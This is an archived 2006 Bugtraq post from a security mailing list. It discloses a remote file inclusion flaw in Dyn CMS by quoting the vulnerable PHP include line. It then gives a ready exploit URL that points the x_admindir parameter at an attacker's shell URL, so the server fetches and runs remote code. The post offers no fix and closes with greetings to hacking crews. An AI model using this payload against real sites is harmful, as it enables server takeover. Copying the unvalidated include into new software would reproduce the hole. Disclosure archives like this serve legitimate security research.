| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 2 Sep 2006 20:53:03 -0000 From: SHiKaA-@...mail.com To: bugtraq@...urityfocus.com Subject: Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit #============================================================================================== #Dyn CMS <= REleased (x_admindir) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://www.dyncms.com/ # #Version : REleased # #================================================================================================ #Bug in : 0_admin/modules/Wochenkarte/frontend/index.php # #Vlu Code : #-------------------------------- # <? include_once($x_admindir."/modules/".$xmodulname."/frontend/tools.inc.php"); # # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=http://SHELLURL.COM? # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke KACPER Rgod Timq XoRon MDX Bl@...B1rd AND ALL ccteam (coder-cruze-wolf) | cyper-worrior ==================================================================================================
Powered by blists - more mailing lists